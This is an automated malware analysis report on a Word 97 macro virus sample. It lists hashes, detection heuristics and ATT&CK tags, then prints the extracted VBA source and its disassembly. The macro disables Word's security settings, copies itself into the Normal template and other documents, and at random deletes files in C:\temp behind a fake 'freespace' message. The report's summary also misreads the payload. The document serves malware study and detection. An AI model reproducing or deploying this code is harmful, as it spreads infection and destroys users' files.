Office (OLE) malware analysis — malicious · 6c42db3e2eaa4c01

MALICIOUS

Office (OLE)

29.0 KB Created: 2001-08-07 13:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: dcf75c39ce37aa18c5b02608ab363624 SHA-1: e65695e19d9e371b6eeeb38e5c7e133d3b2754a5 SHA-256: 6c42db3e2eaa4c012789f05e3ef0bb012b39e415dd6d9fc6f0c63662adeb5e8f

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro designed to disable security settings and execute a payload. The macro attempts to bypass Word's macro security by modifying registry keys and disabling security prompts. The payload appears to be truncated but includes a command to kill a file at 'C:\tem', suggesting a downloader or dropper functionality.

Heuristics 3

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6686 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6686 bytes
SHA-256: `bd2bbab1f08071716a00b54028b6bc53418aca3850d6cae311a4973fa9db305c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Lisa" Attribute VB_Base = "1Normal.Lisa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'W97m.freespace.a by SEMTEX Private Sub Document_Open() On Error Resume Next Set Code = New DataObject Options.ConfirmConversions = 0 Options.SaveNormalPrompt = 0 Options.VirusProtection = 0 With Application .StatusBar = "READY" End With If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = 0 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End If CommandBars("Tools").Controls("Macro").Enabled = 0 If NormalTemplate.VBProject.VBComponents(1).Name = "Lisa" Then callitn = True Else Set A = NormalTemplate.VBProject.VBComponents(1) End If If ActiveDocument.VBProject.VBComponents(1).Name = "Lisa" Then callita = True Else Set A = ActiveDocument.VBProject.VBComponents(1) saveit = True End If Set ab = A.CodeModule Code.SetText Lisa.VBProject.VBComponents(1).CodeModule.Lines(1, Lisa.VBProject.VBComponents(1).CodeModule.CountOfLines) ab.DeleteLines 1, ab.CountOfLines ab.InsertLines 1, Code.GetText A.Name = "Lisa" If callitn = True And callita = True Then If Int(Rnd * 5) = 2 Then Call Lisa_payload End If End If If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End Sub Private Sub Lisa_payload() On Error Resume Next DoEvents Randomize If Int(Rnd * 500) = 2 Then Kill "C:\\temp\." Assistant.Visible = True With Assistant.NewBalloon .Button = msoButtonSetOK .Heading = "READY" .Text = "Windows has just deleted any unwanted files to create freespace" .Show End With End If End Sub ' Processing file: /opt/analyzer/scan_staging/d984f22403004dc7a369326fdb741f26.bin ' =============================================================================== ' Module streams: ' Macros/VBA/Lisa - 3897 bytes ' Line #0: ' Line #1: ' QuoteRem 0x0000 0x001A "W97m.freespace.a by SEMTEX" ' Line #2: ' FuncDefn (Private Sub Document_Open()) ' Line #3: ' OnError (Resume Next) ' Line #4: ' SetStmt ' New <crash> ' Set Code ' Line #5: ' LitDI2 0x0000 ' Ld Options ' MemSt ConfirmConversions ' Line #6: ' LitDI2 0x0000 ' Ld Options ' MemSt SaveNormalPrompt ' Line #7: ' LitDI2 0x0000 ' Ld Options ' MemSt VirusProtection ' Line #8: ' Line #9: ' StartWithExpr ' Ld Application ' With ' Line #10: ' LitStr 0x0005 "READY" ' MemStWith StatusBar ' Line #11: ' EndWith ' Line #12: ' Line #13: ' LitStr 0x0000 "" ' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" ' LitStr 0x0005 "Level" ' Ld System ' ArgsMemLd PrivateProfileString 0x0003 ' LitStr 0x0000 "" ' Ne ' IfBlock ' Line #14: ' LitDI2 0x0000 ' LitStr 0x000B "Security..." ' LitStr 0x0005 "Macro" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' MemSt Enabled ' Line #15: ' LitDI4 0x0001 0x0000 ' LitStr 0x0000 "" ' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" ' LitStr 0x0005 "Level" ' Ld System ' ArgsMemSt PrivateProfileString 0x0003 ' Line #16: ' EndIfBlock ' Line #17: ' LitDI2 0x0000 ' LitStr 0x0005 "Macro" ' LitStr 0x0005 "Tools" ' ArgsLd CommandBars 0x0001 ' ArgsMemLd Controls 0x0001 ' MemSt Enabled ' Line #18: ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' LitStr 0x0004 "Lisa" ' Eq ' IfBlock ' Line #19: ' LitVarSpecial (True) ' St callitn ' Line #20: ' ElseBlock ' Line #21: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' Set A ' Line #22: ' EndIfBlock ' Line #23: ' LitDI2 0x0001 ' Ld ActiveDo ... (truncated)

SHA-256: bd2bbab1f08071716a00b54028b6bc53418aca3850d6cae311a4973fa9db305c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Lisa"
Attribute VB_Base = "1Normal.Lisa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'W97m.freespace.a by SEMTEX
Private Sub Document_Open()
 On Error Resume Next
 Set Code = New DataObject
 Options.ConfirmConversions = 0
 Options.SaveNormalPrompt = 0
 Options.VirusProtection = 0
 
 With Application
 .StatusBar = "READY"
 End With

  If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
     CommandBars("Macro").Controls("Security...").Enabled = 0
     System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
  End If
 CommandBars("Tools").Controls("Macro").Enabled = 0
  If NormalTemplate.VBProject.VBComponents(1).Name = "Lisa" Then
    callitn = True
   Else
    Set A = NormalTemplate.VBProject.VBComponents(1)
  End If
  If ActiveDocument.VBProject.VBComponents(1).Name = "Lisa" Then
    callita = True
   Else
    Set A = ActiveDocument.VBProject.VBComponents(1)
    saveit = True
  End If
  Set ab = A.CodeModule
   Code.SetText Lisa.VBProject.VBComponents(1).CodeModule.Lines(1, Lisa.VBProject.VBComponents(1).CodeModule.CountOfLines)
   ab.DeleteLines 1, ab.CountOfLines
   ab.InsertLines 1, Code.GetText
   A.Name = "Lisa"
   If callitn = True And callita = True Then
    If Int(Rnd * 5) = 2 Then
      Call Lisa_payload
    End If
   End If
  If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
Private Sub Lisa_payload()
On Error Resume Next

DoEvents
Randomize
If Int(Rnd * 500) = 2 Then

 Kill "C:\\temp\*.*"

 Assistant.Visible = True
With Assistant.NewBalloon
    .Button = msoButtonSetOK
    .Heading = "READY"
    .Text = "Windows has just deleted any unwanted files to create freespace"
    .Show
End With
 
End If

End Sub



' Processing file: /opt/analyzer/scan_staging/d984f22403004dc7a369326fdb741f26.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Lisa - 3897 bytes
' Line #0:
' Line #1:
' 	QuoteRem 0x0000 0x001A "W97m.freespace.a by SEMTEX"
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	SetStmt 
' 	New <crash>
' 	Set Code 
' Line #5:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #6:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #7:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #8:
' Line #9:
' 	StartWithExpr 
' 	Ld Application 
' 	With 
' Line #10:
' 	LitStr 0x0005 "READY"
' 	MemStWith StatusBar 
' Line #11:
' 	EndWith 
' Line #12:
' Line #13:
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #14:
' 	LitDI2 0x0000 
' 	LitStr 0x000B "Security..."
' 	LitStr 0x0005 "Macro"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #15:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #16:
' 	EndIfBlock 
' Line #17:
' 	LitDI2 0x0000 
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #18:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0004 "Lisa"
' 	Eq 
' 	IfBlock 
' Line #19:
' 	LitVarSpecial (True)
' 	St callitn 
' Line #20:
' 	ElseBlock 
' Line #21:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set A 
' Line #22:
' 	EndIfBlock 
' Line #23:
' 	LitDI2 0x0001 
' 	Ld ActiveDo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.